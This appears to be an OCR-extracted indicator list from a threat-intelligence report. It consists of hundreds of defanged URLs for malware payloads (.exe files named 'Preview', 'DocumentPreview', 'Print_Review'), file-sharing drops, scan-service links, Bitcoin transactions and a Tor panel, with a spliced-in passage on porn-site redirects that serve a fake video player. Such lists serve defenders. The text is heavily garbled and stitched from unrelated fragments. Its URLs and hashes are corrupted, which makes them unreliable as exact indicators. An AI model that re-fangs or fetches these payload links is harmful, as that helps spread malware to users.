hxxp://send[. lfirefox[.]com/download/f1f821fc41f81955/ 
hxxp://wwwI[.]sendspace[.]com/file/4srnj2 
hxxp://wwwl[.]sendspace[.]com/delete/4srnj2/a23ef5005d78378069 112a2a715a62b0 
hxxp://qaz[.]im/load/Qzd347/AhHa7R 
hxxp://qaz[.]im/index[.]php?a=delete &q=14824157 
hxxp://qaz[.]im/load/s24D6A/NQK8ny 
hxxp://qaz[.]im/index[.]php?a=delete &q=1819985312 
hxxp://qaz[.]Jim/load/a9F4b9/Y2KyRr 
hxxp://qaz[.]im/index[.]php?a=delete &g=1609191564 
hxxp://qaz[.]im/load/QFYGNt/8kdrGr 
hxxp://qaz[.]im/index[.]php?a=delete &q=528016256 
hxxp://go[.]microsoft[.]com/fwlink/?linkid=37020 &name=Trojan 
hxxp://qaz[.]im/load/YKseQR/b59zkG 
hxxp://qaz[.]im/index[.]php?a=delete &q=436437015 
hxxp://qaz[.]im/load/Tz2tfS/ZyED4f 
hxxp://qaz[.]Jim/load/hANRd9/QktS94 
hxxp://qaz[.]im/load/t2ffEa/6KRHQb 
hxxp://qaz[.]im/index[.]php?a=delete &q=1758857013 
hxxp://qaz[.Jim/load/5KYb7k/ztTZHF 
hxxp://qaz[.Jim/index[.]php?a=delete &q=2065306140 
hxxp://qaz[.]im/load/BSSFIY/RbT2k4 
hxxp://qaz[.]im/index[.]php?a=delete &q=833676777 
hxxp://copyrightlive-uae[.]com/calc[.]exe 
hxxp://fex[.]net/s/srvkzrm 
hxxp://copyrightlive-uae[.]com/DAFSDASD[.]exe 
hxxp://qaz[.Jim/load/YBTZrT/dbTB2F 
hxxp://avcheck[.]net/id/VgdsOlv2DJQO 
hxxp://avcheck[.]net/id/SmVEdnsJLm5P 
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hxxp://qaz[.]im/load/kDkeeY/3NNBBz 
hxxp://qaz[.]im/index[.]php?a=delete &g=370587775 
hxxp://qaz[.]im/load/E7Rsh7/BZ52HQ 
hxxp://qaz[.]im/index[.]php?a=delete &q=1725054101 
hxxp://qaz[.]im/load/RSafBF/89K3By 
hxxp://qaz[.]im/index[.]php?a=delete &g=705696157 
hxxp://dyncheck[.]com/scan/id/c290e06f921596032b18b89f106fade3 
hxxp://qaz[. ]im/load/Y9GyEe/Fa3ZDQ 
hxxp://qaz[.]im/index[.]php?a=delete &g=470107062 
hxxp://qaz[.]im/load/25NAzZG/KYbei2 
hxxp://qaz[.]im/index[.]php?a=delete &q=1036761259 
hxxp://dyncheck[.]com/scan/id/7c45c19ec93aaab85ffe2f0b47b1321b 
hxxp://dyncheck[.]com/scan/id/c10337a6702fc44a6bfbe8cd6143e2al 
hxxp://qaz[.]im/load/riFtSn/T6dB3T 
hxxp://qaz[.]im/index[.]php?a=delete &q=43420443 
hxxp://qaz[.]im/load/nFGBR7/rn3553 
hxxp://qaz[.]im/index[.]php?a=delete &q=1493660577 
hxxp://qaz[.]im/load/6z9a96/ihr4s4 


hxxp://wwwl.]blockchain[.]com/btc/tx/d2c482986b6d2270d9bbfb35192ee4c4 
24d4563ecd1dcd4e54aeeeef0 


hxxp://alwasl-syria[.]com/DocumentPreview|[. ]exe 
hxxp://www[.]lomegasystemsuae[.]com/DocumentPreview|[.]exe 
hxxp://allacestech[.]com/DocumentPreview|[.]exe 
hxxp://bloomfieldholding[.]com/PreviewDocument[.]exe 
hxxp://qaz[.]lim/load/Ya4DAF/HhsKsD 
hxxp://qaz[.]im/index[.]php?a=delete &q=1844081767 
hxxp://qaz[.]lim/load/KANZKT/a3sHHi 
hxxp://qaz[.lim/load/dKAkKz/kiQnfB 
hxxp://qaz[.]im/index[.]php?a=delete &q=1668181258 
hxxp://www[. ]ottenbourg[.]com/Doc-Preview[.]exe 
hxxp://prntscr[.]com/ti9t35 
hxxp://shighil[.]com/Doc-Preview[.]exe 

hxxp://www[. Jottenbourg[.]com/AcademiPreview|[.]exe 
hxxp://qaz[.]im/load/N2yZT4/3hyBff 
hxxp://qaz[.]im/index[.]php?a=delete &q=1217715647 
hxxp://qaz[.]lim/load/6zyk9i/DtKbQE 
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939f77b- 


hxxp://qaz[.]im/index[.]php?a=delete &q=1904928990 
hxxp://qaz[.]im/load/daFHK7/kA8z7d 
hxxp://qaz[.Jim/index[.]php?a=delete &q=561058648 
hxxp://qaz[.Jim/load/NNF3ht/fsRz75 
hxxp://qaz[.]im/load/QBGkKH/yiAkbn 
hxxp://qaz[.]im/index[.]php?a=delete &q=2102432673 
hxxp://qaz[.]im/load/dzAdZn/BATDGd 
hxxp://qaz[.Jim/index[.]php?a=delete &q=725977516 
hxxp://qaz[.Jim/load/D68YNr/NEBHz4 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1831549256 
hxxp://qaz[.]im/load/rkKHBYe/bySNKG 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1984087384 
hxxp://qaz[.]im/load/G2EZ2d/9NdN64 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1411138404 
hxxp://qaz[.]im/load/fr8Ad9/hn8NrY 
hxxp://qaz[.]im/index[.]php?a=delete &q=323023007 
hxxp://qaz[.]Jim/load/2fyn65/YdA8sN 
hxxp://qaz[.]im/load/yTNAGb/bD6FNQ 
hxxp://qaz[.Jim/index[.]php?a=delete &q=18866609 
hxxp://qaz[.]Jim/load/ABNaSZ/EGfnna 
hxxp://qaz[.]im/index[.]php?a=delete &q=657120362 
hxxp://qaz[.]Jim/load/9YddS9/98FfNT 
hxxp://qaz[.]im/index[.]php?a=delete &q=1577111912 
hxxp://prnt[.]sc/tm320g 
hxxp://avcheck[.]net/id/sBoFjalLQh8q 
hxxp://qaz[.]im/load/Yab8FK/yY8Gi7 
hxxp://qaz[.]im/index[.]php?a=delete &q=808037942 
hxxp://qaz[.]im/load/65bHzk/R2Z3yh 
hxxp://qaz[.Jim/index[.]php?a=delete &q=2025534070 
hxxp://qaz[.]im/load/HSTHEB/ZH3f9F 
hxxp://qaz[.]im/index[.]php?a=delete &q=1707750678 
hxxp://qaz[.]im/load/a64QQn/Ks9r2E 
hxxp://qaz[.]im/index[.]php?a=delete &q=983067181 
hxxp://qaz[.]im/load/8dHefG/d3SaRZ 
hxxp://qaz[.]im/index[.]php?a=delete &q=1467741435 
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hxxp://qaz[.]im/load/ENSGBF/y7k47z 
hxxp://qaz[.]im/index[.]php?a=delete &q=919069904 
hxxp://qaz[.]im/load/dzzndi/di62Fs 
hxxp://qaz[.]im/index[.]php?a=delete &q=702606483 
hxxp://qaz[.]im/load/5HS7Zb/Rb5Y32 
hxxp://qaz[.]im/index[.]php?a=delete &gq=1383634474 
hxxp://dyncheck[.]com/scan/id/9b5c85e120924407f2b9821167e60595 
hxxp://qaz[.]im/load/GySBas/aAQDQR 
hxxp://qaz[.]im/index[.]php?a=delete &q=757317013 


hxxp://www[.]blockchain[.]com/btc/tx/fo65d090a96b69391f3c55a416673d6d 
725dc46bb662909e6bfaabfe71a08e3 


hxxp://qaz[.]im/load/d2K2bf/ZQB8br 
hxxp://qaz[.]im/index[.]php?a=delete &q=651435474 
hxxp://qaz[.]im/load/BNn9fD/Hd983G 
hxxp://qaz[.]im/index[.]php?a=delete &q=1606146959 
hxxp://qaz[.]im/load/2ZEH4S/eAk3rF 
hxxp://qaz[.]im/index[.]php?a=delete &q=505283717 
hxxp://qaz[.]im/load/e3kied/72Y43R 
hxxp://qaz[.]im/index[.]php?a=delete &q=1623342650 
hxxp://qaz[.]im/load/ARybiT/saDYSF 
hxxp://qaz[.]im/load/DQaQi8/G3FD89 
hxxp://qaz[.]im/index[.]php?a=delete &q=1101583292 
hxxp://dyncheck[.]com/scan/id/5f23dbe1f84b5e0e071d1082b0bd8ele 
hxxp://dyncheck[.]com/scan/id/db7c7e67e80b9255c4f9b8244dcc868e 
hxxp://dyncheck[.]com/scan/id/23a90625b008a7982cbfe7db0395a747 
hxxp://dyncheck[.]com/scan/id/2f91347f35dd4aab3d92a29b9b78bba9 
hxxp://qaz[.]im/load/nnhn98/enEzhF 
hxxp://qaz[.]im/index[.]php?a=delete &q=1319491298 
hxxp://qaz[.]im/load/RFbiQi/e7Q6Ka 
hxxp://qaz[.]im/load/NHkSb6/f229k7 
hxxp://qaz[.]im/index[.]php?a=delete &q=1772258901 
hxxp://qaz[.]im/load/Bde5NZ/N8Zb7D 
hxxp://qaz[.]im/index[.]php?a=delete &q=1633133020 
hxxp://anonfiles[.]com/b9V4e3J107/12 zip 
hxxp://qaz[.]im/load/2h6EY8/HY3D6e 
hxxp://qaz[.]im/load/SfAZKF/TA8Q4D 
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hxxp://qaz[.]im/load/6yrt47/sfhG7e 
hxxp://qaz[.Jim/load/zQfit2/Qftyit 
hxxp://dyncheck[.]com/scan/id/6c21ef4ee94c8149bab6c268f48fe853 
hxxp://qaz[.]Jim/load/Y34ezk/bdYynA 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1596060943 
hxxp://qaz[.Jim/load/Skd2Sa/t2FZkz 
hxxp://qaz[.]im/index[.]php?a=delete &q=1824226258 
hxxp://qaz[.]Jim/load/824HbH/8By55s 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1048741673 
hxxp://qaz[.]im/load/adZS84/r9SeiN 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1758958750 


hxxp://wwwl[.]blockchain[. ]com/btc/tx/545863f72effdb59ea326a55243c4543 
7615469214edf4bflabdd098685c742e 


hxxp://megal.]nz/file/mvxFODqa 
hxxp://qaz[.]im/load/b8NKH6/s5s4KF 
hxxp://qaz[.Jim/index[.]php?a=delete &q=386986491 
hxxp://qaz[.]Jim/load/a9fDaA/z6dYi8 
hxxp://qaz[.]Jim/load/GrE5ZF/ybtha7 
hxxp://qaz[.]im/load/fAdeZA/ntByeH 
hxxp://qaz[.]im/load/ifFiDa/aAaGNf 
hxxp://qaz[.Jim/index[.]php?a=delete &q=665207771 
hxxp://qaz[.]im/load/G3nNiT/AYhz26 
hxxp://qaz[.]im/index[.]php?a=delete &q=1287609932 
hxxp://qaz[.]im/load/26R2RT/kdeATY 
hxxp://qaz[.]im/index[.]php?a=delete &q=343924512 
hxxp://qaz[.Jim/load/Si8ek7/8BYSBK 


hxxp://www[.]blockchain[.]com/btc/tx/e6e87c019e96ff5e55be24f4b45 7bcc8 
52d767b84fe462141f546759 


hxxp://qaz[.Jim/load/984d7i/rytKrE 

hxxp://qaz[.Jim/load/t7 AR2F/TrSyyZ 
hxxp://qaz[.]im/load/T79sbh/zQtz9Y 
hxxp://qaz[.]im/load/r5n87f/eR5k72 
hxxp://dyncheck[.]com/scan/id/53bf98f4d72df417082a3e595c01e734 
hxxp://prntscr[.]com/tyxzg6 

hxxp://qaz[.]im/load/KYKd3a/5SKk88 
hxxp://qaz[.]im/load/QTSK8N/8DidG3 


c64a376d- 
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hxxp://qaz[.]im/load/hEZSZN/2kKSHFS 
hxxp://qaz[.]im/load/83f3Kk/6YRnie 
hxxp://qaz[.]im/load/sd2rQh/bkGHar 
hxxp://dyncheck[.]com/scan/id/0b987333fe0d417309a3aed4651927f2 
hxxp://qaz[.]im/load/GYQ7za/Br3hki 
hxxp://qaz[.]im/load/TdtAh8/7AHidi 
hxxp://qaz[.]im/load/sSHdR7/B4GtbQ 
hxxp://qaz[.]im/index[.]php?a=delete &q=960613050 

hxxp://qaz[. ]im/load/5Bd337/6SZENy 
hxxp://qaz[.]im/index[.]php?a=delete &q=1886417694 
hxxp://qaz[.]im/load/Nf73hh/NA28NS 
hxxp://qaz[.]im/load/irtyHQ/QakdSr 
hxxp://qaz[.]im/index[.]php?a=delete &q=1179028703 
hxxp://qaz[.]im/load/4E39e9/zDie6b 
hxxp://go[.]microsoft[.]com/fwlink/?linkid=37020 &name=PUA 
hxxp://qaz[.]lim/load/EBZTaE/9QHTtN 
hxxp://qaz[.]im/index[.]php?a=delete &q=777323424 
hxxp://go[.]microsoft[.]com/fwlink/?linkid=37020 &name=Behavior 


hxxp://wwwl[.]blockchain[.]com/btc/tx/6c522e20d5c8b9e7c09fc6f07819eb3 
3ba320134568d699ee434bc7ee4f23fd0 


hxxp://qaz[.]lim/load/yS4DfK/Y9DQy3 
hxxp://qaz[.]im/index[.]php?a=delete &q=162972714 
hxxp://qaz[.]lim/load/QRs3aE/aAfd5R 
hxxp://qaz[.]im/index[.]php?a=delete &q=664293903 
hxxp://qaz[.]im/load/HfZDsb/YsE3Qk 
hxxp://qaz[.]im/index[.]php?a=delete &q=1264680681 


hxxp://wwwl. ]blockchain[.]com/btc/tx/184f0aea22f0a86d495d2ca543d4e303 
2ca0abc087fle54fd06d0248f3f9f757 


hxxp://qaz[.]im/load/Getz3Q/e8YZnK 
hxxp://qaz[.]im/index[.]php?a=delete &q=527352396 
hxxp://qaz[.]lim/load/5F4eby/H7EDhS 
hxxp://qaz[.]im/index[.]php?a=delete &q=418921146 
hxxp://qaz[.]im/load/3SNTGB/BY7YhG 
hxxp://qaz[.]im/index[.]php?a=delete &q=687796139 
hxxp://qaz[.]im/load/9TtHAb/fi6GQY 
hxxp://qaz[.]lim/load/ToZYfh/F4hGZA 
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hxxp://qaz[.Jim/index[.]php?a=delete &q=1226162072 


hxxp://wwwI[.]blockchain[. ]com/btc/tx/808190479cef4c768ddca32e62a5d5af 
f453bebb46985bc95288387c40alf7ec 


hxxp://qaz[.]im/load/dibdiR/A2NDya 
hxxp://qaz[.Jim/index[.]php?a=delete &q=169997059 
hxxp://qaz[.]im/load/4ZZdGb/fF2S6d 
hxxp://qaz[.]im/load/HNaQRn/RkR8T2 
hxxp://qaz[.Jim/load/b7rFzb/hQGiRi 
hxxp://qaz[.Jim/load/FrHB95/6itaQG 
hxxp://qaz[.Jim/load/8K8frT/FHZhNE 
hxxp://qaz[.]im/index[.]php?a=delete &q=441586268 
hxxp://qaz[.Jim/load/A4brkF/H7b5Sa 
hxxp://qaz[.]im/index[.]php?a=delete &q=1981880392 
hxxp://qaz[.]im/load/a4GfFR/k74nA6 
hxxp://qaz[.]im/load/ffHSys/DSHKrt 
hxxp://qaz[.]im/load/nSz5Y5/F85f54 
hxxp://qaz[.]Jim/load/8AsT5e/enH5TK 
hxxp://go[.]microsoft[.]com/fwlink/?linkid=37020 &name=Program 
hxxp://qaz[.]im/load/rrK8yQ/iHAN3f 
hxxp://qaz[.]im/index[.]php?a=delete &q=441815748 
hxxp://qaz[.]im/load/z6kT9z/S3Fd8N 
hxxp://qaz[.]im/index[.]php?a=delete &q=247218977 
hxxp://qaz[.]Jim/load/5r5rr5/4z4d4Y 
hxxp://qaz[.]im/index[.]php?a=delete &g=369651355 
hxxp://qaz[.]im/load/d88hfa/eDyyh9 
hxxp://qaz[.]im/index[.]php?a=delete &q=94424269 
hxxp://qaz[.]im/load/4ZbYzB/E4bGDa 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1002603330 
hxxp://wwwl.]shighil[.]com/dl2[.]exe 


hxxp://wwwl[.]blockchain[.]com/btc/tx/85b4b49cbf3 9f2df9e9d4d4a6b213f49 
b6a985ec8a511376294d4197a8b 


hxxp://qaz[.Jim/load/BfSiAR/TsYbSt 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1947430289 
hxxp://qaz[.]Jim/load/BtDYyk/B63ttT 
hxxp://qaz[.Jim/index[.]php?a=delete &q=304245879 
hxxp://qaz[.]im/load/4kSdEE/DYFQQt 


f6d3f- 
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hxxp://qaz[.]im/index[.]php?a=delete &q=260243593 
hxxp://qaz[.]im/load/KeKaZr/EyT54F 
hxxp://qaz[.]im/index[.]php?a=delete &q=524320466 
hxxp://qaz[.]im/load/H9TBz2/FRH3ar 
hxxp://qaz[.]im/load/6nf3yE/rTHHQZ 
hxxp://qaz[.]im/index[.]php?a=delete &q=1619074582 
hxxp://qaz[.]Jim/load/Y5524D/2b8zQi 
hxxp://qaz[.]im/load/i4D5S7/22QNhT 
hxxp://qaz[.]im/index[.]php?a=delete &q=1349615969 
hxxp://anonfiles[.]com/D2U6LbQ704/ld1_gr_1 exe 
hxxp://qaz[.]im/load/RBG9Qz/zfKHz8 
hxxp://qaz[.]im/index[.]php?a=delete &q=1023625885 
hxxp://qaz[.]im/load/EzGdsa/TNEDQd 


hxxp://wwwl. ]blockchain[.]com/btc/tx/1147f7522333e03362e586131c166425 
33aac01bleale4061d24c87bc 


hxxp://qaz[.]im/load/e4T98B/6DBG7y 
hxxp://anonfiles[.]com/z6dfqbROo5/dl7 x64 _ release nologs exe 
hxxp://anonfiles[.]com/lfYar8Reo3/ld1 _gr_1_exe 
hxxp://qaz[.]im/load/HszTFi/5iFkZd 
hxxp://qaz[.]im/load/7 BGh8t/sGZTzA 
hxxp://qaz[.]im/index[.]php?a=delete &q=1206622663 
hxxp://qaz[. ]im/load/d4bKh9/4Ttk3i 
hxxp://qaz[.]im/index[.]php?a=delete &q=381884196 
hxxp://qaz[.]im/load/BzfGNy/yFhDRR 
hxxp://qaz[.]im/load/Ze2sH4/dnfkiS 
hxxp://qaz[.]im/load/t6B7Qd/EdzDir 
hxxp://qaz[.]im/load/fZRYzZ4/FbHt38 
hxxp://qaz[.]im/index[.]php?a=delete &q=1111404508 
hxxp://qaz[.]im/load/5EhsaA/Sz64dz 
hxxp://qaz[.]im/index[.]php?a=delete &q=1336303307 
hxxp://qaz[.]im/load/5SR67R/dHs3fT 
hxxp://qaz[.]im/index[.]php?a=delete &q=186569023 
hxxp://qaz[.]im/load/5A4Rr6/HREGF5 
hxxp://qaz[.]im/index[.]php?a=delete &q=1185891789 
hxxp://qaz[.]lim/load/5Q3fys/7HTbn6 
hxxp://qaz[.]im/index[.]php?a=delete &q=1078400322 
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fdec7d0- 


hxxp://qaz[.Jim/load/95aYyN/zarZH9 
hxxp://qaz[.]im/index[.]php?a=delete &q=1671622988 
hxxp://qaz[.]im/load/3GKi8d/Qd74Qs 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1528786231 
hxxp://qaz[.]im/load/54F GK9/rZseY 4 
hxxp://qaz[.]im/index[.]php?a=delete &q=217220637 
hxxp://qaz[.]im/load/S4r684/rkHnbb 
hxxp://qaz[.]im/load/kfdK39/EaYTfd 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1859869088 
hxxp://qaz[.Jim/load/fkaTbQ/haQiyi 
hxxp://qaz[.]im/index[.]php?a=delete &q=1070409066 
hxxp://qaz[.]im/load/n4dGRR2/72ZGRQ 
hxxp://qaz[.Jim/index[.]php?a=delete &q=2139691045 
hxxp://qaz[.Jim/load/E3k7N2/Zia5F7 
hxxp://qaz[.]im/index[.]php?a=delete &q=1144155310 
hxxp://qaz[.]im/load/nEHBhe/R6QNHn 
hxxp://qaz[.]im/index[.]php?a=delete &q=1918482579 
hxxp://qaz[.Jim/load/2bbZzt/QhiN95 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1024131999 
hxxp://anonfiles[.]com/J4rflfT906/Preview _exe 
hxxp://anonfiles[.]com/j8h3J8T807/Preview _exe 
hxxp://qaz[.]im/load/SZ627B/2keNf9 
hxxp://qaz[.]im/index[.]php?a=delete &q=1514558796 
hxxp://reefglobal[.]com/Preview[.]exe 
hxxp://prnt[.]sc/uexlvk 3eceT KOCUT 
hxxp://aspiremedstaff[.]com/Print[.Jexe 
hxxp://anonfiles[.]com/91dfV4T509/Print Preview _exe 
hxxp://emploimed[.]com/Print _Preview[.]exe 
hxxp://qaz[.Jim/load/TaA8hf/d2DSQ3 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1841434315 
hxxp://qaz[.Jim/load/STd9Kr/rTYrne 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1792737976 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1976601793 
hxxp://qaz[.]im/load/n8NfGQ/FikRA7 
hxxp://qaz[.]im/load/Z43z4G/T4KdkY 
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hxxp://qaz[.]im/index[.]php?a=delete &q=794509984 
hxxp://www[.]namaskardunia[.]com/Preview[.]exe 
hxxp://qaz[.]im/load/Rrt5dK/Ad7D3F 
hxxp://qaz[.]im/index[.]php?a=delete &q=1149433752 
hxxp://qaz[.]im/load/F2BHBf/iBZz2FS 
hxxp://qaz[.]im/index[.]php?a=delete &q=194449554 
hxxp://ncdzrppa5xl3vw5 7|k6x3prcj5p63y3m46t4giq6rvdsa3woed3hicid[.Jonio n/crpanel/ 
hxxp://qaz[. ]im/load/6dY6Fh/yTDh4A 
hxxp://qaz[.]im/index[.]php?a=delete &q=1729255318 
hxxp://qaz[.]im/load/DGrfFd/sSiBER 
hxxp://qaz[.]im/index[.]php?a=delete &q=1630678487 
hxxp://prnt[.]sc/ufhb29 

hxxp://qaz[.]im/load/K6BKAS/7 bahHD 
hxxp://qaz[.]im/index[.]php?a=delete &q=436150958 
hxxp://qaz[.]im/load/5fRYBe/GdtSeb 
hxxp://qaz[.]im/index[.]php?a=delete &q=1338062155 
hxxp://qaz[.]im/load/nbzeH3/ZEHGIQ 
hxxp://qaz[.]im/index[.]php?a=delete &q=1580700510 
hxxp://qaz[.]im/load/h46dYb/8DY2y3 
hxxp://qaz[.]im/index[.]php?a=delete &q=2131831935 
hxxp://dyncheck[.]com/scan/id/c1lfccbb6a597bf2a6680fbdaeac8b618 
hxxp://dyncheck[.]com/scan/id/2bd5751861ec52478189ceb09131cdc5 
hxxp://qaz[.]lim/load/H4TraE/Y9KRTk 
hxxp://qaz[.]im/index[.]php?a=delete &q=645629772 
hxxp://dyncheck[.]com/scan/id/ff110d613450946c01388abb8f72305e 
hxxp://qaz[.]im/load/2SHEni/z5Hzy5 
hxxp://qaz[.]im/index[.]php?a=delete &q=1554595965 
hxxp://qaz[.]im/load/erBbTQ/AG6BTG 
hxxp://qaz[.]im/index[.]php?a=delete &q=2079437145 
hxxp://alwaslegypt[.]com/Preview[.]exe 

hxxp://www[. Jadventureworldindia[.]com/Preview[.]exe 
hxxp://www[.lomegasystemsuae[.]com/Preview[.]exe 
hxxp://www[.]omegasystemsuae[.]com/BKOFR[.]exe 
hxxp://coffschamber[.]com[.]au/Review[.]exe 
hxxp://cdn-102[.]lanonfiles[.]com/XdzdPbVfo8/a6501123-1600284832/Rev iew[.Jexe 
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IP Address Host Name Original Name 


4,200.5 sextapedirls.net 


nude.com 
<atynude.com ki com 
tube-4you-best.com quickly-porn-tube.net 
tube-4you- 


2009download-best-soft.com 


Future-pictures.com 


All the internal pages at sextapegirls .net (sextapegirls .net/1.html; sextapegirls .net/2.html; 
sextapegirls .net/3.html; sextapegirls .net/4.html; sextapegirls .net/5.html) redirect to 
hotvidz .info/5.html (88.214.200.5) as well as all the internal pages at celebsvids .net where 
[2]TubePlayer.ver.6.20885.exe is served as a fake video player. 


Among the rest of the domains used, katynude .com/1.html (216.195.57.47) redirects to 
quickly-porn-tube .net/get.php?id=20885 &p=74 (69.59.21.247) which then redirects to 
tube-4you-best .com/xxplay.php?id=20885 (69.59.21.247) where 2009download-best-soft 
.com/TubePlayer.ver.6.20885.exe (94.247.3.228) is again served. 


The fourth domain used on_ the’ bogus _ LinkedIn _ profiles, delshikandco 
.com/movies/linkedin.html (82.103.132.114) once deobfuscated leads to delshiktds 
.com/in.cgi?6 (64.27.28.225), a traffic management kit’s redirection point which redi- 
rects to delshiktds .com/in.cgi?11, celebs-online2009 .com/video.php (64.27.28.225) and 
megaporntubesonline __.com/xplays.php?id=88 where codecdownload.filesstorage4you 
.com/exclusivemovie.88.exe [3]is served next to codecdownload.viewersoftwarearchive 
.com/exclusivemovie.0.exe (94.247.3.232) which a copy of [4]Win32/Renos. 
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hxxp://cdn-33[.]anonfiles[.]com/L30eQ0Vbo2/d37ab69a-1600287659/Preview [.]exe 

hxxp://qaz[.Jim/load/3AhtRB/T8eDrN 

hxxp://qaz[.]im/load/hNEN38/QybTBB 

hxxp://anonfiles[.]com/bd4620W909/MOR124 exe 

hxxp://qaz[.]im/load/3Dihs4/FD4d2b 

hxxp://nutritionprofbob[.]com/Preview[.]exe 

hxxp://qaz[.]im/load/YNFHb4/tHSTY7 

hxxp://qaz[.Jim/load/7fS49n/nzaGFa 

hxxp://qaz[.]im/index[.]php?a=delete &q=1614436032 

hxxp://dyncheck[.]com/scan/id/41c1fccd7b5350c6872f506cb93ca2fd 

hxxp://qaz[.Jim/load/K54yrR/sfnSrF 

hxxp://dyncheck[.]com/scan/id/62824ead496a1d296c19353b39636c23 

hxxp://qaz[.Jim/load/iQnRYn/sA7Tah 

hxxp://qaz[.]im/load/s2iTet/4bseNf 

hxxp://qaz[.Jim/index[.]php?a=delete &q=322236178 

hxxp://qaz[.]im/load/4BffaB/NHAy3F 

hxxp://qaz[.]im/index[.]php?a=delete &q=1645965689 

hxxp://qaz[.]Jim/load/TaaKYk/FfRIDR 

hxxp://qaz[.]im/index[.]php?a=delete &q=524648545 

hxxp://qaz[.]im/load/hQ7ksB/R79kfF 

hxxp://qaz[.]im/index[.]php?a=delete &q=1123885455 

hxxp://qaz[.]im/load/dBBi4t/tdisE4 

hxxp://qaz[.Jim/index[.]php?a=delete &q=1063519113 

hxxp://qaz[.]im/load/F94344/bt5yBT 

hxxp://qaz[.]im/index[.]php?a=delete &q=1158901644 

hxxp://qaz[.]im/load/d93zha/RRbsk9 

hxxp://qaz[.Jim/index[.]php?a=delete &q=871472123 

hxxp://qaz[.Jim/load/ndEKHY/HFN3DB 

hxxp://qaz[.Jim/index[.]php?a=delete &q=1338178029 

hxxp://qaz[.]im/load/rQAFNA/rB6hrK 

hxxp://qaz[.]im/index[.]php?a=delete &q=2114058233 

hxxp://drive[.]google[.]com/file/d/LUt8eYpulGHIBkrCKBQFR5qDkR8IHgMtk/ view?usp=sharing 

hxxp://drive[.]google[.]com/file/d/latL4Qhn88r6gHNj7VDXdg1LxSh80J70 45/view?usp=sharing 

hxxp://drive[.]google[.]com/file/d/1ZOIBnOI9fAjralXnTLNC5rQvimw AcIx-/view?usp=sharing 

hxxp://drive[.]google[.]com/file/d/lvaGy3trD1LbBUrYfqg8RiQ1xVaqje0 Jw-M/view?usp=sharing 
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hxxp://drive[.]google[.]com/file/d/1Jf9207YjOB35GD259kYqgH7WY2g - 
2u8AO/view?usp=sharing 


hxxp://qaz[.]Jim/load/dz84kKH/4RAY7N 
hxxp://qaz[.]im/index[.]php?a=delete &g=978698457 
hxxp://qaz[.]lim/load/tFKyBT/bKtSe2 
hxxp://qaz[.]im/index[.]php?a=delete &q=309053296 


hxxp://drive[.]google[.]Jcom/file/d/1 | =Wg _SPqYB54Wsj3IGsJ5HZEHrAimGfNw/view?usp=sh- 
aring 


hxxp://qaz[.]im/load/EthHNz/aRya92 
hxxp://qaz[.]im/index[.]php?a=delete &q=1146888702 
hxxp://qaz[.]im/load/bsSRFA/5bR2sf 
hxxp://qaz[.]im/index[.]php?a=delete &q=239422258 
hxxp://dubaidreamsadventure[.]com/Print _Review[.]exe 
hxxp://qaz[.]im/load/5bQ2ye/hkGD47 
hxxp://qaz[.]im/index[.]php?a=delete &q=1150522410 
hxxp://qaz[.]im/load/B784Qs/iT76na 

hxxp://qaz[. ]im/load/8GZ47T/4239Z8 
hxxp://qaz[.]im/index[.]php?a=delete &q=818904846 
hxxp://qaz[.]im/load/fADBBk/h7f2de 
hxxp://qaz[.]im/index[.]php?a=delete &q=380716076 
hxxp://qaz[.]im/load/bKYbhB/EyKDf2 
hxxp://qaz[.]im/index[.]php?a=delete &q=593769558 
hxxp://qaz[.]lim/load/7d23hA/2SK9aB 


hxxp://drive[.]google[.]com/uc?export=download &id=1QLHAIIVqw4leW3lj _kUN- 
msU21550epa2 


hxxp://qaz[. ]im/load/f8eHRG/3ZtHZK 
hxxp://qaz[.]im/load/YarzbR/zsksfz 
hxxp://qaz[.]im/index[.]php?a=delete &q=551496646 
hxxp://qaz[.]im/load/sfEeie/hrSKE7 
hxxp://qaz[.]im/load/2YEZZt/5i6kHb 
hxxp://qaz[.]im/load/HnY8YS/8fZ4Dy 
hxxp://qaz[.]im/load/aZBy5s/B4RK4N 
hxxp://qaz[.]im/index[.]php?a=delete &q=1726461836 
hxxp://qaz[.]im/load/SNZZfR/SSZBGH 
hxxp://qaz[.]im/index[.]php?a=delete &q=1972058496 
hxxp://qaz[.]im/load/ANbFtE/84dANT 
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hxxp://qaz[.Jim/index[.]php?a=delete &q=381477130 
hxxp://qaz[.]im/load/hfQSTf/T7tbst 
hxxp://qaz[.]im/load/QbidbK/BkTtFk 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1483245274 
hxxp://qaz[.]Jim/load/khr7bK/DeYtKh 
hxxp://qaz[.]im/index[.]php?a=delete &q=659004819 
hxxp://qaz[.]Jim/load/dDaedd/RnKG86 
hxxp://qaz[.]im/load/GtH2R5/KYs56k 
hxxp://qaz[.Jim/load/NdEFK4/8riDiE 
hxxp://qaz[.]im/load/sft6Te/ADDRGY 
hxxp://qaz[.]Jim/load/REdD9d/bA8r8R 
hxxp://qaz[.]im/load/bbN9F8/KnHBnz 
hxxp://qaz[.Jim/load/eHYb5Y/RZ7YQF 
hxxp://qaz[.]im/load/r5ErN3/fFkZKy 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1383610803 
hxxp://qaz[.]im/load/fHfZf3/zZRFQaB 
hxxp://qaz[.]im/index[.]php?a=delete &q=618478449 
hxxp://qaz[.]im/load/RiE7YZ/aEYEh8 
hxxp://qaz[.Jim/index[.]php?a=delete &q=790823496 
hxxp://qaz[.]im/load/ThbZYN/72i9D6 
hxxp://qaz[.Jim/index[.]php?a=delete &q=276777128 
hxxp://qaz[.]Jim/load/RZzeAh7/R4A4Z4 
hxxp://qaz[.Jim/index[.]php?a=delete &q=1037432016 
hxxp://qaz[.]im/load/HkfEe8/QrANnR 
hxxp://qaz[.Jim/index[.]php?a=delete &q=134558980 
hxxp://qaz[.]im/load/Eo78DA/5DQ9QK 
